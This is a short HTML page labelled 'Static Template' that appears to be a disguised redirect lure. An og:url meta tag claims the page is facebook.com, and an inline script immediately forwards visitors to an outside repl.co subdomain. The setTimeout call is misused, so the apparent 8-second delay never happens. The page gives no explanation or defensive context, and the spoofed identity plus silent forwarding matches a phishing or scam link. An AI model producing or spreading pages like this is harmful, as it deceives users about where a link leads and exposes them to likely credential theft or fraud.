<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>Static Template</title>
  </head>
  <body>
    <meta property="og:url" content="https://www.facebook.com/" />'<script
      language="javascript"
    >
      setTimeout(
        (location.href = "https://video0110--cn14135.repl.co"),
        8000
      );</script
    >';
  </body>
</html>

